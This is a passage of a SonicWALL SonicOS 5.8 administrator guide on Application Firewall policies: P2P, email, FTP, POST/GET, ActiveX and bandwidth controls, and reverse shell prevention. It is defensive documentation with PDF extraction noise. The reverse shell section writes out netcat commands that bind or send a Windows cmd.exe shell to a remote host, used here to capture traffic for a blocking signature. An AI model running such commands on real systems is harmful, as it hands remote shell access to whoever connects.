• “HTTP Post Control” on page 58
• “Forbidden File Type Control” on pag e 61
• “ActiveX Control” on page 63
• “FTP Control” on page 65
• “Bandwidth Management” on page 70
• “Bypass DPI” on page 72
• “Custom Signature” on page 74
• “Reverse Shell Exploit Prevention” on page 77
22
Application Control and Application Firewall in SonicOS 5.8
Policy-Based Application Control
The application signature databases that were previously included with SonicWALL Intrusion Prevention
Service (IPS) are now part of the Application Control feature. These signature databases are used to protect
users from application vulnerabilities as well as worms, Trojans, peer-to-peer transfers, spyware and
backdoor exploits. The extensible signature language used in SonicWALL’s Deep Packet Inspection engine
also provides proactive defense against newly discovered application and protocol vulnerabilities.
When configured within the Application Firewall environment, the administrator is allowed far more
granular control over the configuration and actions than could previously be applied to IPS signatures.
To create an Application Control policy in Application Firewall, first create a match object of type
Application Signature List or Application Signature Category List. T hese two types allow for selection of
either general application categories or individual application signatures. The example in Figure 23 shows a
match object targeted at LimeWire and Napster Peer to Peer sharing applications.
Figure 23Example of Granular P2P Match Object
Using Application Control
After creating a signature-based match object, create a new policy of type App Control Content that uses
the match object. The example in Figure 24 shows an Application Firewall policy which uses the newly
created “Napster/LimeWire P2P” match object to drop all Napster and LimeWire traffic.
Application Control and Application Firewall
21
Using Application Control
Standard Logging
App Control Formatted Logging
Figure 24Example of Application Control Content Policy
Logging Application Signature-Based Policies
As with other match object policy types, logging can be enabled on application content policies. By default,
these logs are displayed in the standard format, showing the Application Firewall policy that triggered the
alert/action. To obtain more detail about the log event, select the Lo g using App Control message format
checkbox in the Application Firewall Policies Settings screen for that policy.
Figure 25Standard Logging vs App Control Formatted Logging
22
Application Control and Application Firewall in SonicOS 5.8
Compliance Enforcement
E7500
Network Security Appliance
Internet
E7500
Network Security Appliance
HTTP
SMTP/
POP3
FTP
Client
Many businesses and organizations need to ensure compliance with their policies regarding outbound file
transfer. Application Firewall provides this functionality in HTTP, FTP, POP3, and SMTP contexts. This
can help companies meet regulatory requirements such as HIPAA, SOX, and PCI.
When you configure the policy or policies for this purpose, you can select Direction > Basic > Outgoing to
specifically apply your file transfer restrictions to outbound traffic. Or , you can select Dir ection > Advanced
and then specify the exact zones between which to prevent file transfer. For example, you can specify LAN
to WAN, LAN to DMZ, or any other zones that you have defined.
Figure 26Compliance Enforcement
Server Protection
Using Application Control
Servers are typically accessed by many untrusted clients. F or best protection of these valuable re sources, y ou
should have multiple lines of defense. With Application Firewall on your gateway , you can configure policies
to protect your servers. Fo r example, you can create a policy that blocks all FTP put commands to p revent
anyone from writing a file to a server (see “Blocking FTP Commands” on page 68). Even though the server
itself may be configured as read-only, this adds a layer of security that is controlled by the firewall
administrator. Your server will still be protected even if its configuration is changed by an error, a side-effect
of a patch, or by someone with malicious intent. With Application Firewall, you can effectively control
content upload for servers using HTTP, SMTP, POP3, and FTP.
Figure 27Server Protection from Content Upload
An example of policies that affect servers might be a small ISP providing three levels of service to its
customers, whose servers are sitting in its rack. At the gold level, a customer can host a Web server, Email
server, and FTP server. At the silver level, a customer can host only a Web server and Email server. At the
bronze level, the hosting package only allows a Web server. The ISP could use Application Firewall to
enforce these restrictions, by creating a policy for each customer.
Application Control and Application Firewall
21
Using Application Control
Hosted Email Environments
A hosted email environment is one in which email is available on a user’s Internet Serv ice Provider (ISP).
T ypically , POP3 is the protocol used for email transfer in this environment. Many small-business owners use
this model, and would like to control email content as well as email attachments. Running Application
Firewall on the gateway provides a solution for controlling POP3-based as well as SMTP-based email.
Application Firewall can also scan HTTP, which is useful for email hosted by sites suc h as Yahoo or Gmail.
Note that when an attachment is blocked while using HTTP, Application Firewall does not provide the file
name of the blocked file. You can also use Application Firewall to control FTP when accessing database
servers.
If you want a dedicated SMTP solution, you can use SonicWALL Email Security. Email Security is used by
many larger businesses for controlling SMTP-based email, but it does not support POP3. For controlling
multiple email protocols, Application Firewall provides an excellent solution.
Email Control
Application Firewall can be very effective for certain types of email control, especiall y when a blanket policy
is desired. For example, you can prevent sending attachments of a given type, such as .exe, on a per-user
basis, or for an entire domain. Because the file name extension is being matched in this case, changing the
extension before sending the attachment will bypass filtering. Note that you can also prevent attachments
in this way on your email server if you hav e one . If not, then Application Firewall provides the functionality.
You can create a match object that scans for file content matching strings such as “confidential”, “internal
use only” and “proprietary” to implement basic controls over the transfer of proprietary data.
Y ou can also create a policy that prevents email to or from a specific domain or a specific user. You can use
Application Firewall to limit email file size, but not to limit the number of attac hments . Application Firewall
can block files based on MIME type. It cannot block encrypted SSL or TLS traffic, nor can it block “all
encrypted files”. To bloc k encrypted email from a site that is using HTTPS, you can create a custom match
object that matches the certificate sent before the HTTPS session begins. This is part of the SSL session
before it gets encrypted. Then you would create a custom policy that blocks that certificate.
Application Firewall can scan email attachments that are text-based or are compressed to one level, but not
encrypted. Tab le 5 lists file formats that Application Firewall can scan for keywords. Other formats should
be tested before you use them in a policy.
Table 5Supported File Formats
File TypeCommon Extension
C source codec
C+ source codecpp
Comma-separated valuescsv
HQX archiveshqx
HTMLhtm
Lotus 1-2-3wks
Microsoft Accessmdb
Microsoft Excelxls, xlsx
Microsoft PowerPoin tppt, pptx
Microsoft Visiovsd
Microsoft Visual Basicvbp
22
Application Control and Application Firewall in SonicOS 5.8
Web Browser Control
You can also use Application Firewall to protect your Web servers from undesirable browsers. Application
Firewall supplies match object types for Netscape, MSIE, Firefox, Safari, and Chrome. You can define a
match object using one of these types, and reference it in a policy to block that browser.
Using Application Control
File TypeCommon Extension
Microsoft Worddoc, docx
Microsoft Workswps
Por tab le D ocu men t Formatpdf
Rich Text Formatrtf
SIT archivessit
Text filestxt
WordPerfectwpd
XMLxml
Tar archives (“tarballs”)tar
ZIP archiveszip
You can also access browser version information by using an HTTP User Agent match object type. For
example, older versions of various browsers can be susceptible to security problems. Using Application
Firewall, you can create a policy that denies access by any problematic browser, such as Internet Explorer
5.0. You can also use negative matching to exclude all browsers except the one(s) you want. For example,
you might want to allow Internet Explorer version 6 only, due to flaws in version 5, and because you haven’ t
tested version 7. To do this, you would use a netw ork protocol analyzer suc h as Wiresha rk to determine the
W eb bro wser identifier for IEv6, which is “MSIE 6.0”. Then you could cre ate a match object of type HTTP
User Agent, with content “MSIE 6.0” and enable negative matching. See Figure 28.
Figure 28MSIE 6.0 Match Object
Application Control and Application Firewall
21
Using Application Control
You can use this match object in a policy to block browsers that are not MSIE 6.0. For information about
using Wireshark to find a Web browser identifier, see “Wireshark” on page 45. For information about
negative matching, see “Negative Matching” on page 14.
Another example of a use case for controlling Web browser access is a small e-commerce site that is selling
discounted goods that are salvaged from an overseas source. If the terms of their agreement with the
supplier is that they cannot sell to citizens of the source nation, they could configure Application Firewall
to block access by the in-country versions of the major Web browsers.
Application Control supports a pre-defined selection of well-known browsers, and you can add others as
custom match objects. Browser blocking is based on the HTTP User Agent reported by the browser. Your
custom match object must contain content specific enough to identify the browser without creating false
positives. You can use Wireshark or another network protocol analyzer to obtain a unique signature for the
desired browser.
HTTP Post Control
You can enhance the security of public facing read-only HTTP servers by disallowing the HTTP POST
method.
First, use Notepad or another text editor to create a new document called Post. htm that contains the HTML
code below. Save the file to your desktop or a convenient location.
<FORM action="http://www.yahoo.com/" method="post">
<p>Please enter your name: <input type="Text" name="FullName"></p>
<input type="submit" value="Submit"> <INPUT type="reset">
Then open the Wireshark network analyzer and start a capture. For information about using Wireshark, see
Wireshark, page 45. In a browser, open the Post.htm form you just created and type in your name and then
click Submit. Stop the capture.
Using the Wireshark Edit > Find Packet function, search for the string ‘POST’.
Figure 29Wireshark Edit > Find Packet
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Wireshark will jump to the first frame that contains the requested data. You should s ee something like
Figure 30. This indicates that the HTTP POST method is transmitted immediately after the TCP header
information and is compri sed of the first four bytes (504f5354) o f the TCP payload (HTTP application
layer). You can use that information to create a custom match object that detects the HTTP POST method.
Figure 30HTTP POST Packet
In the SonicOS management interface, navigate to Firewall > Match Objects, and then click Add New
Match Object. Create a match object like the one shown in Figure 31. Notice that in this particular match
object you would use the Enable Settings feature to create an object that matches a specific part of the
payload. The Offset field specifies which byte in the payload to begin matc hing and helps to minimize false
positives by making the match more specific. The Depth field specifies at what byte to stop matching. The
Min and Max fields allow you to specify a minimum and maximum payload size.
Figure 31HTTP POST Match Object
Application Control and Application Firewall
21
Using Application Control
Next, navigate to Firewall > App Rules and click Add New Policy. Create a policy like the one shown in
Figure 32.
Figure 32HTTP POST Policy
T o test, use a bro wser to open the P ost.htm document y ou created ear lier. Type in your name and then click
Submit. The connection should be dropped this time and you should see an alert in the log similar to the
one in Figure 33.
Figure 33Log Entry for HTTP POST
22
Application Control and Application Firewall in SonicOS 5.8
Forbidden File Type Control
Y ou can use Applicati on Firew all to prev ent ri sky or forbidden file types (e .g. exe, vbs, scr, d ll, a vi, mo v, etc)
from being uploaded or downloaded.
Navigate to Firewall > Match Objects and click Add New Match Object. Create an object like the one
shown in Figure 34.
Figure 34Forbidden File Type Match Object
Using Application Control
Next, navigate to Firewall > Action Objects and click Add New Action Object. Create an action like the
one shown in Figure 35.
Figure 35Forbidden File Type Action
Application Control and Application Firewall
21
Using Application Control
To create a policy that uses this object and action, navigate to Firewall > App Rules and click Add New
Policy. Create a policy like the one shown in Figure 36.
Figure 36Forbidden File Type Policy
To test this policy, you can open a Web browser and try to download any of the file types specified in the
Match Object (exe, vbs, scr). Below are a few URLs that you can try:
You will see an alert similar to the one shown in Figure 37.
Figure 37Log Entry for Forbidden Fil e Type
22
Application Control and Application Firewall in SonicOS 5.8
ActiveX Control
One of the most useful capabilities of Application Firewall is the abili ty to distinguish between different
types of ActiveX or Flash network traffic. This allows you to block games while permitting Windows
updates. Prior to Application Firew all, you could configure SonicOS to bloc k ActiveX with Securi ty Services
> Content Filter, but this blocked all ActiveX controls, including your software updates. See Figure 38.
Figure 38Security Services > Content Filter
Using Application Control
Application Firewall achieves this distinction by scanning for the value of classid in the HTML source. Each
type of ActiveX has its own class ID, and the class ID can change for d ifferent version s of the same
application. Some ActiveX types and their classid’s are shown in Table 6.
Table 6ActiveX Class IDs
ActiveX TypeClassid
Apple Quicktime02BF 25D5-8C17-4 B23-BC80-D34 88ABDDC6B
Macromedia Flash v6, v7D27CDB6E-AE6D-11cf-96B8-44455354 0000
Macromedia ShockwaveD27CDB6E-AE6D-11cf-96B8-444553540000
Microsoft Windows Media Player v6.422d6f312-b0f6- 11d0-94ab- 0080c7 4c7e95
Microsoft Windows Media Player v7-106BF52A52-394A-11d3-B153-00C04F79FAA6
Real Networks Real PlayerCFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
Sun Java Web Start5852F5ED-8BF4-11D4-A245-0080C6F74284
Application Control and Application Firewall
21
Using Application Control
Figure 39 shows an ActiveX type match object that is using the Macromedia Shockwave class ID. You can
create a policy that uses this match object to block online games or other Shockwave-based content.
Figure 39ActiveX Match Object
Y ou can look up the class ID for these Activ e X controls on the Internet, or you can view the source in y our
browser to find it. For example, Figure 40 shows a source file with the cl ass ID for Macr omedi a Shockw a ve
or Flash.
Figure 40Shockwave/Flash Class ID
22
Application Control and Application Firewall in SonicOS 5.8
FTP Control
Application Firewall provides control over the FTP control channel and FTP uploads and downloads with
the FTP Command and File Content match object types. Using these, you can regulate FTP usage very
effectively. The following use cases are described in this section:
• “Blocking Outbound Proprietary Files Over FTP” on page 65
For example, to block outbound file transfers of proprietary files over FTP, you can create a policy based
on keywords or patterns inside the files.
First, you would create a match object of type File Content that matches on k eyw ords in files. See Figure 41.
Figure 41Keywords in File Content
Using Application Control
Optionally, you can create a customized FTP notification action that sends a message to the client.
Application Control and Application Firewall
21
Using Application Control
Next, you would create a policy that references this match object and action. If you prefer to simply block
the file transfer and reset the connection, you can select the Reset/Drop action when you create the policy.
See Figure 42.
Figure 42FTP File Control Policy
Blocking Outbound UTF-8 / UTF-16 Encoded Files
Native Unicode UTF-8 and UTF-16 support by Application Firewall allows encoded multi-byte characters,
such as Chinese or Japanese characters, to be entered as match object content keywords using the
alphanumeric input type. Application Firewall supports keyword matching of UTF-8 encoded content
typically found in Web pages and email applications, and UTF-16 encoded content typically found in
Windows OS / Microsoft Office based documents.
Blocking outbound file transfers of proprietary Unicode files over FTP is handled in the same way as
blocking other confidential file transfers. First, create a match object that matches on UTF-8 or UTF-16
encoded keywords in files. Next, create a policy that references the match object and blocks transfer of
matching files.
The example shown in Figure 43 uses a match object type of File Content with a UTF-16 encoded Chinese
keyword that translates as “confidential document.”
22
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Figure 43UTF-16 File Content Match Object
Next, create a policy that references the match object, as in Figure 44. This policy blocks the file transfer
and resets the connection. Enable Logging is selected so that any attempt to transfer a file containing the
UTF-16 encoded keyword is logged.
Figure 44FTP File Control Policy for UTF-16 Match Object
Application Control and Application Firewall
21
Using Application Control
A log entry is generated after a connection Reset/Drop. The screenshot in Figure 61 shows the log entry,
including the message stating that it is an Applicatio n Firewall Aler t, displaying the Policy name and the
Action Type of Reset/Drop.
Figure 45Log Entry for UTF-16 Confidential Document
Blocking FTP Commands
You can use Application Firewall to ensure that your FTP server is read-only by blocking commands such
as put, mput , rename_to, rename_from, rmdir, and mkdir. This use case shows a match object
containing only the put command, but you could include all of these commands in the same match object.
The first step is to create a match object that matches on the put command. Because the mput command
is a variation of the put command, a match object that matches on the put command will also matc h on the
mput command. See Figure 46.
Figure 46FTP put Command
22
Optionally, you can create a customized FTP notification action that sends a message to the client. A
customized action is shown in Figure 47.
Figure 47Customized FTP Notification
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
Next, you would create a policy that references this match object and action. If you prefer to simply block
the put command and reset the connection, you can select the Reset/Drop action when you create the
policy. See Figure 48.
Figure 48FTP Put Policy
Application Control and Application Firewall
21
Using Application Control
Bandwidth Management
Y ou can use application la yer bandwidth management to contro l the amount of netw ork bandwidth that can
be used to transfer certain file types. This allows you to discourage non-productive traffic and encourage
productive traffic on your network.
For example, you can limit the bandwidth used to download MP3 files over FTP to no more than 400
kilobits per second (kbps). Whether one user or 100 users are downloading MP3 files, this policy will limit
their agg reg ate bandw idth to 400 kbps.
The first step is to enable bandwidth management on the interface that will handle the traffic . Y ou can access
this setting on the Network > Interfaces screen of the SonicOS management interface. For complete
instructions, see “Configuring Application Layer Bandwidth Management” on pag e 40.
The Network > Interfaces screen, Advanced tab is shown in Figure 49.
Figure 49Enabling Bandwidth Managemen t on an Inte rfa ce
22
Application Control and Application Firewall in SonicOS 5.8
Next, define a match object of type File Extension for the MP3 file extension.
Figure 50MP3 File Extension Match Object
Using Application Control
Next, you can create an application layer bandwidth management action object that limits inbo und transfers
to 400 kbps.
Now you are ready to create a policy that applies the bandwidth management action to the MP3 file
extension object.
Figure 52MP3 Bandwidth Management Policy
Bypass DPI
22
Application Control and Application Firewall in SonicOS 5.8
You can use the Bypass DPI action to increase performance over the network if you know that the content
being accessed is safe. For example, this might be the case if your company has a corporate video that you
want to stream to company employees o v er HTTP by having them access a URL on a Web server. Since you
know that the content is safe, you can create an Application Firewall policy that applies the Bypass DPI
action to every access of this video . This will ensure the fastest streaming speeds and the best viewing quality
for employees accessing the video.
Using Application Control
Only two steps are needed to create the policy. First, you can define a match object for the corporate video
using a match object type of HTTP URI Content. Note that the leading slash (/) of the URL should always
be included for Exact Match and Prefix Match types for URI Content match objects. You do not need to
include the host header, such as “www.company.com”, in the Content field.
Figure 53Bypass DPI Match Object
Next, create a policy that uses the Corporate Video match object, and also uses the Bypass DPI action:
Figure 54Bypass DPI Policy
Application Control and Application Firewall
21
Using Application Control
Custom Signature
You can create a custom match object that matches any part of a packet if you want to control traffic that
does not have a predefined object type in Application Firewall. This allows y ou to create a custom signature
for any network protocol.
For instance, you can create a custom signature to match HTTP GET request packets. You might use this
if you want to prevent Web browsing from your local area network.
To determine a unique identifier for a HTTP GET packet, you can use the Wireshark network protocol
analyzer to view the packet header. For more information about using Wireshark, see “Wireshark” on
page 45. In Wireshark, capture some packets that include the traffic you are interested in. In this case, you
want to capture a HTTP GET request packet. You can use any Web browser to generate the HTTP GET
request. Figure 55 shows a HTTP GET request packet displayed by Wireshark.
Figure 55HTTP GET Request in Wireshark
22
In the top pane of Wireshark, scroll down to find the HTTP GET packet, and click on that line. The packet
is displayed in the two lower panes. For a SYN packet, the center pane provides a human-readable
interpretation of the packet header, and the actual header bytes are displayed in hexadecimal in the lower
pane.
In the center pane, expand the Hypertext Transfer Protocol section to see the packet payload and click on
the identifier that you want to reference in Application Firewall. In this case, the identifier is the GET
command in the first three bytes. Click on this to highlight the corresponding bytes in the lower pane.
Y ou can determine the offset and the depth of the highlighted bytes in the low er p ane . Offset an d depth are
terms used by Application Firewall. Offset indicates which byte in the packet to start matching against, and
depth indicates the last byte to match. Using an offset allows very specific matching and minimizes false
positives. When you calculate offset and depth, note that the first byte in the packet is counted as number
Application Control and Application Firewall in SonicOS 5.8
Using Application Control
one (not zero). Decimal numbers are used rather than hexadecimal to calculate offset and depth. Offset and
depth associated with a custom match object are calculated starting from the packet pa yload (the beginning
of the TCP or UDP payload). In this case, the offset is 1 and the depth is 3.
Now you can create a custom match object that uses this information. See Figure 56.
Figure 56HTTP GET Match Object Settings
In the Match Object Settings window, type a descriptive name for the object and then select Custom Object
from the Match Object Type drop-down list. Select the Enable Settings check box. In the Offset text
box, type 1 (the starting byte of the identifier). In the Depth text box, type 3 (the last byte of the identifier).
You can leave the Paylo a d S i ze set to the default.
For Input Representation, click Hexadecimal. In the Content text box, type the bytes as shown by
Wireshark: 474554. Do not use spaces in hexadecimal content.
The next step is to use this match object in a policy. In the Application Firewall Policy Settings window
(Figure 57), type a descriptive policy name and select HTTP Client for the policy type. In the Match Object drop-down list, select the match object that you just defined. Select a custom action or a default
action such as Reset/Drop. For the Connection Side, select Client Side. You can also modify other
settings. F or more information about creating a policy, see “Configuring an Application Firewall Policy” on
page 43.
Application Control and Application Firewall
21
Using Application Control
The policy settings are shown below.
Figure 57HTTP GET Blocking Policy
22
Application Control and Application Firewall in SonicOS 5.8
Reverse Shell Exploit Prevention
The reverse shell exploit is an attack that you can prevent by using Application Firewall’s custom signature
capability (See “Custom Signature” on page 74). A reverse shell exploit could be used by an attacker if he
or she is successful in gaining access to your system by means of a Zero-day exploit. A Zero-day exploit
refers to an attack whose signature is not yet recognized by security software.
In an early stage while still unknown, malicious payloads can pass through the first line of defense which is
the IPS and Gateway Anti-Virus (GA V) running at the Internet gateway, and even the second line of defense
represented by the host-based Anti-Virus software, allowing arbitrary code execution on the target system.
In many cases, the executed code contains the minimal amount of instructions needed for the attacker to
remotely obtain a command prompt window (with the privileges of the exploited service or logged on user)
and proceed with the penetration from there.
As a common means to circumvent NAT/firewall issues, which might prevent their ability to actively
connect to an exploited system, attackers will make the vulnerabl e system execute a reverse shell. In a reverse
shell, the connection is initiated by the target host to the attacker address , using well known TCP/UDP ports
for better avoidance of strict outbound policies.
This use case is applicable to environments hosting Windows systems and will intercept unencrypted
connections over all TCP/UDP ports.
Using Application Control
NoteNetworks using unencrypted Telnet service must configure policies that exclude those
servers’ IP addresses.
While this use case refers to the specific case of reverse shell payloads (outbound connections), it is more
secure to configure the policy to be effective also for inbound connections. This protects against a case
where the executed payload spawns a listening shell onto the vulnerable host and the attacker connects to
that service across misconfigured firewalls.
The actual configuration requires the following:
• Generating the actual network activity to be fingerprinted, using the netcat tool
• Capturing the activity and exporting the payload to a text file, using the Wireshark tool
• Creating a match object with a string that is reasonably specific and unique enough to avoid false
positives
• Defining a policy with the action to take when a payload containing the object is parsed (the default
Reset/Drop is used here)
Generating the Network Activity
The netcat tool offers – among other features – the ability to bind a program’s output to an outbound or a
listening connection. The following usage examples show how to setup a listening “Command Prompt
Daemon” or how to connect to a remote endpoint and provide an interactive command prompt:
• nc –l –p 23 –e cmd.exe
A Windows prompt will be available to hosts connecting to port 23 (the -l option stand s for listen mode
as opposed to the default, implicit, connect mode).
• nc –e cmd.exe 44.44.44.44 23
A Windows prompt will be av ailable to ho st 44.44.44.4 4 if host 44.44.44.44 is listening on port 23 using
the netcat command:
nc -l -p 23
Application Control and Application Firewall
21
Using Application Control
Capturing and Exporting the Payload to a Text File, Using Wireshark
To capture the data, launch Wireshark and click Capture > Interfaces to open a capture dialog. Start a
capture on the interface with the netcat traffic. As soon as the capture begins, run the netcat command and
then stop the capture.
Figure 58 shows the data flow through the network during suc h a connection (Vista Enterprise, J une 2007):
Figure 58Command Prompt Capture
The hexadecimal data can be exported to a text file for trimming off the packet header , unneeded or v ariable
parts and spaces. The relevant portion here is “Microsoft… reserved.” You can use the Wireshark
hexadecimal payload export capability for this. For information about Wireshark, see “Wireshark” on
page 45.
Creating a Match Object
The following hexadecimal characters are entered as the Object Content of the Match Object representing
the Vista command prompt banner:
Note that fingerprint export and the Match Object definition do not really need to use hexadecimal notation
here (the actual signature is ASCII text in this case). Hexadecimal is only required for binary signatures.
Similar entries are obtained in the same manner from Windows 2000 and Windows XP hosts and used to
create other Match Objects, resulting in the three Match Objects shown in Figure 59.
Figure 59Three Custom Match Objects for Windows Command Prompt s
Other examples for Windows Server 2003 or any other Windows version may be easily obtained using the
described method.
Linux/Unix administrators will need to customize the default environment variable in order to take
advantage of this signature based defense, as the default prompt is typically not sufficiently specific or
unique to be used as described above.
22
Application Control and Application Firewall in SonicOS 5.8
Defining the Policy
After creating the Match Objects, you can define a Policy that uses them. Figure 60 shows the other Policy
settings. This example as shown is specific for reverse shells in both the Policy Name and the Direction
settings. As mentioned, it may also be tailored for a wider scope with the Direction setting changed to Both
and a more generic name.
Figure 60Reverse Shell Policy
Using Application Control
A log entry with a Category of Network Access is generated after a connection Reset/Drop. The screenshot
in Figure 61 shows the log entry, including the Message stating that it is an Application Firewall Alert and
displaying the Policy name.
Figure 61Reverse Shell Reset/Drop Log Entry
As experience suggests, appropriate security measures would include several layers of intelligence and no
single approach can be considered a definitive defense against hostile code.
Application Control and Application Firewall
21
Using Application Control
Glossary
Application layer: The seventh level of the 7-layer OSI model; examples of application layer protocols are
AIM, DNS, FTP, HTTP, IMAP, MSN Messenger, POP3, SMTP, SNMP, TELNET, and Yahoo Messeng er
Client: Typically, the client (in a client-ser ver architecture) is an application that runs on a pers onal
computer or workstation, and relies on a server to perform some operations
Digital rights management: Technology used by publishers or copyright owners to control access to and
usage of digital data
FTP: File Transfer Protocol, a protocol for exchanging files over the Internet
Gateway: A computer that serves as an entry point for a network; often acts as a firewall or a proxy server
Granular control: The ability to control separate components of a system
Hexadecimal: Refers to the base-16 number system
HTTP: Hyper Text Transfer Protocol, the underlying protocol used by the World Wide Web
HTTP redirection: Also known as URL redirection, a technique on the Web for making a Web page
available under many URLs
IPS: Intrusion Prevention Service
MIME: Multipurpose Internet Mail Extensions, a specification for formatting non-ASCII messages such
as graphics, audio, or video, so that they can be sent over the Internet
POP3: Post Office Protocol, a protocol used to retrieve email from a mail server; can be used with or
without SMTP
Proxy: A computer that operates a netw ork service that allows clients to make indirect network connections
to other network services
SMTP: Simple Mail Transfer Protocol, a protocol used for sending email messages between servers
UDP: User Datagram Protocol, a connectionless protocol that r uns on top of IP networks
22
232-001985-00 Rev A
Last Updated: 12/21/2010
Application Control and Application Firewall in SonicOS 5.8
Loading...
+ hidden pages
You need points to download manuals.
1 point = 1 manual.
You can buy points or you can get point for every manual you upload.